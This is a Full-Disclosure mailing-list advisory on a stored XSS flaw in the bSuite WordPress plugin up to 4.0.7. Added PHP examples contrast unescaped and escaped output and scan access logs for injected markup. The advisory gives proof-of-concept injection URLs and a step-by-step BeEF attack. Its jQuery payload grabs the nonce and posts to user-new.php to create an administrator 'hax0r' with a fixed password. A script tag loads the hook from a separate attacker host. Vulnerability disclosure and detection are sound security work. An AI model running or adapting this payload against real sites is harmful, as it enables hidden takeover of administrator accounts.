
[Full-disclosure] bsuite <= 4.0.7 Permanent XSS (Remote add admin) - Wordpress plugin



<html>
  <head>

    <meta http-equiv="content-type" content="text/html; charset=ISO-8859-15">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    Original advisory:
    <a class="moz-txt-link-freetext"
href="http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/">http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/</a><br>
    <br>
    <p><strong>WordPress bSuite &lt;= 4.0.7 Permanent XSS -&gt; Add
        Admin</strong><br>
      <strong>Download link:</strong>
      <a class="moz-txt-link-freetext"
href="http://wordpress.org/extend/plugins/bsuite/">http://wordpress.org/extend/plugins/bsuite/</a><br>
      <strong>Author contact:</strong> 29/06/2011<br>
      <strong>POC published:</strong> 11/07/2011<br>
      The plugin is out of date (last updated in 2009), so this is just a PoC
      that shows how to make the XSS more useful ;)</p>
    <p><strong>FIX:</strong> Escape the stored value with htmlspecialchars() at the point where it is output.</p>
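    <p>The following is an added example, not code from the bSuite plugin or from the advisory. It reproduces the pattern the advisory describes (a visitor-supplied search term is stored and later printed on an admin-only page) and places the vulnerable output next to the fixed output that the FIX line calls for. All names, the sample stored values and the hook URL are hypothetical.</p>

```php
<?php
// Added example, not the bSuite plugin's own code. Reproduces the pattern the
// advisory describes: a search term taken from ?s=... is stored and later printed
// on an admin-only statistics page. Function and variable names are hypothetical.

// Constructed sample of values a plugin might have stored from ?s=... requests.
$storedSearches = [
    'wordpress themes',
    '<h2>XSSED</h2>',
    '<script src="http://hook.example.invalid/hook.js"></script>',
];

// Vulnerable pattern: the stored string is concatenated into HTML unchanged, so
// the browser of whoever views the stats page parses any tags it contains.
function renderRowVulnerable(string $term): string
{
    return '<tr><td>' . $term . '</td></tr>';
}

// Fixed pattern: htmlspecialchars() turns <, >, &, " and ' into entities, so the
// browser displays the text instead of interpreting it. ENT_QUOTES is passed
// explicitly because PHP before 8.1 left single quotes alone by default.
// Inside WordPress, esc_html() is the equivalent helper for this context.
function renderRowFixed(string $term): string
{
    return '<tr><td>' . htmlspecialchars($term, ENT_QUOTES, 'UTF-8') . '</td></tr>';
}

// Each output context needs its own escaper: a URL parameter is percent-encoded,
// element text is entity-encoded (esc_attr() covers attribute values in WordPress).
// Escaping on input instead of output is weaker, because the same stored value
// may later be used in a non-HTML context (CSV export, e-mail, JSON).
function renderLinkFixed(string $term): string
{
    $text = htmlspecialchars($term, ENT_QUOTES, 'UTF-8');
    return '<a href="?s=' . rawurlencode($term) . '">' . $text . '</a>';
}

foreach ($storedSearches as $term) {
    echo "vulnerable: " . renderRowVulnerable($term) . "\n";
    echo "fixed:      " . renderRowFixed($term) . "\n";
    echo "link:       " . renderLinkFixed($term) . "\n";
}
```

    <p>Run it with <em>php example.php</em>: the vulnerable rows carry the stored markup through verbatim, while the fixed rows show the payload as literal text, which is what the admin should see in the bSuite panel. The point is that the escaping happens when the value leaves the application, chosen for the context it lands in, not when it arrives.</p>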
    <p><strong>Bug found by:</strong> IHTeam<br>
      Simone `R00T_ATI` Quatrini<br>
      Marco `white_sheep` Rondini<br>
      Francesco `merlok` Morucci<br>
      Mauro `epicfail` Gasperini</p>
    <p><strong>Follow us on Twitter! <a
          href="http://twitter.com/IHTeam">@IHTeam</a></strong></p>
    <p><strong>CHECK BSUITE:</strong></p>
    <p><a class="moz-txt-link-freetext"
href="http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js">http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js</a></p>
    <p><strong>PERMANENT XSS POC:</strong><br>
      The XSS can be injected in several ways, for example through the search parameter:</p>
    <p><a class="moz-txt-link-freetext"
href="http://192.168.1.100/wordpress/?s=">http://192.168.1.100/wordpress/?s=</a>&lt;h2&gt;XSSED&lt;/h2&gt;</p>
    <p>or directly in the URL:</p>
    <p><a class="moz-txt-link-freetext"
href="http://192.168.1.100/wordpress/?p=1&amp;">http://192.168.1.100/wordpress/?p=1&amp;</a>&lt;h1&gt;XSSED&lt;/h1&gt;</p>
    <p>Now, when the admin opens the bSuite panel, the injected XSSED markup is rendered:<br>
      <a
        href="http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg">bsuite_XSSED.jpeg</a></p>
    <p><strong>XSS TO REMOTE ADMIN ADD:<br>
      </strong>We will use <a href="http://beefproject.com/"
        target="_blank">beef</a> for that part. So:</p>
    <ol>
      <li>Run beef on your local machine</li>
      <li>Enable auto-run for the following code:</li>
    </ol>
    <blockquote>
      <pre>jQuery("&lt;div&gt;", {
  id: "testbeef"
}).appendTo("#screen-meta-links");
jQuery.get("user-new.php", function(data) {
  jQuery("#testbeef").html(data);
  var nonce = jQuery("#_wpnonce_create-user").val();
  jQuery("#testbeef").html("");

  jQuery.post("user-new.php", {
    "_wp_http_referer": "/wordpress/wp-admin/user-new.php",
    "_wpnonce_create-user": nonce,
    action: "createuser",
    createuser: "Add New User",
    email: "hax0rmail@xxxxxxxx",
    first_name: "",
    last_name: "",
    pass1: "123123hello",
    pass2: "123123hello",
    role: "administrator",
    url: "",
    user_login: "hax0r"
  });
});</pre>
    </blockquote>
    <p>We make two requests to <em>/wordpress/wp-admin/user-new.php</em>
      because we first need to grab the <em>_wpnonce_create-user</em> value.</p>
    <ol>
      <li>First create a new div with ID <em>testbeef</em></li>
      <li>Request user-new.php and append its content to the div</li>
      <li>Grab the _wpnonce_create-user value into the nonce variable</li>
      <li>Clear the div content</li>
      <li>Make a POST request to user-new.php with the correct values</li>
    </ol>
    <p>Review the code and change _wp_http_referer, pass1, pass2 and
      user_login in the POST request.<br>
      Now it&#8217;s time to inject the beef hook script into bSuite like
      this:</p>
    <p><a class="moz-txt-link-freetext"
href="http://192.168.1.100/s=">http://192.168.1.100/s=</a>&lt;script
      src="<a class="moz-txt-link-freetext"
href="http://192.168.1.102/beef/hook/beefmagic.js.php">http://192.168.1.102/beef/hook/beefmagic.js.php</a>"&gt;&lt;/script&gt;</p>
    You may have to wait 1h to 5h for the bSuite panel to refresh. The result is a new admin
    with username <em>hax0r</em> and password <em>123123hello</em>.<br>
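    <p>Because the XSS is stored, the injecting request may be hours or days older than the moment the admin account appears, so the access log is the place to look for it. The script below is an added example, not part of the advisory or the plugin. It decodes the query string of each request and flags the two shapes used above: a plain HTML tag in a parameter (<em>?s=&lt;h2&gt;...</em>, <em>?p=1&amp;&lt;h1&gt;...</em>) and a <em>&lt;script src=...&gt;</em> pointing at an external hook. The log format, IP addresses and hook host are constructed for the example.</p>

```php
<?php
// Added example, not from the advisory. Scans access-log lines for query strings
// that carry HTML markup, the injection vector the advisory describes. Log lines,
// IP addresses and the hook host are constructed for this example.

$sampleLog = <<<'LOG'
203.0.113.5 - - [11/Jul/2011:10:00:01 +0000] "GET /wordpress/?s=wordpress+themes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jul/2011:10:00:07 +0000] "GET /wordpress/?s=%3Ch2%3EXSSED%3C/h2%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Jul/2011:10:01:13 +0000] "GET /wordpress/?p=1&%3Ch1%3EXSSED%3C/h1%3E HTTP/1.1" 200 8000 "-" "curl/7.21"
203.0.113.9 - - [11/Jul/2011:10:02:40 +0000] "GET /wordpress/?s=%3Cscript+src%3D%22http://192.0.2.7/hook.js%22%3E%3C/script%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [11/Jul/2011:10:03:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
LOG;

// Decode the whole query string rather than named parameters only: the
// advisory's second vector puts the markup in a bare "&<h1>..." segment.
function decodeQuery(string $target): string
{
    $query = parse_url($target, PHP_URL_QUERY);
    return ($query === null || $query === false) ? '' : urldecode($query);
}

// Returns a finding type, or null when the query looks harmless.
function classifyQuery(string $query): ?string
{
    if (preg_match('/<\s*script[^>]*\bsrc\s*=/i', $query)) {
        return 'external-script';   // remote hook: the admin-takeover stage
    }
    if (preg_match('/<\s*\/?\s*[a-z][^>]*>/i', $query)) {
        return 'html-markup';       // any tag: the stored-XSS probe
    }
    return null;
}

// Parses "combined"-style lines (client, timestamp, request line) and collects
// the requests whose decoded query string contains markup.
function scanLog(string $log): array
{
    $findings = [];
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*"/';
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($re, $line, $m)) {
            continue;
        }
        $query = decodeQuery($m[4]);
        $kind = classifyQuery($query);
        if ($kind !== null) {
            $findings[] = ['ip' => $m[1], 'ts' => $m[2], 'kind' => $kind, 'query' => $query];
        }
    }
    return $findings;
}

foreach (scanLog($sampleLog) as $f) {
    printf("%s %s %s: %s\n", $f['ts'], $f['ip'], $f['kind'], $f['query']);
}
```

    <p>On the constructed sample the first and last lines are ignored and the middle three are reported, the last of them as <em>external-script</em>. Treat this as a first pass: it only handles single percent-encoding, so a query that is double-encoded or split across parameters needs a second decoding step, and a hit in the log is a reason to inspect the plugin's stored data and the WordPress user list, not a verdict on its own.</p>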
  </body>
</html>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/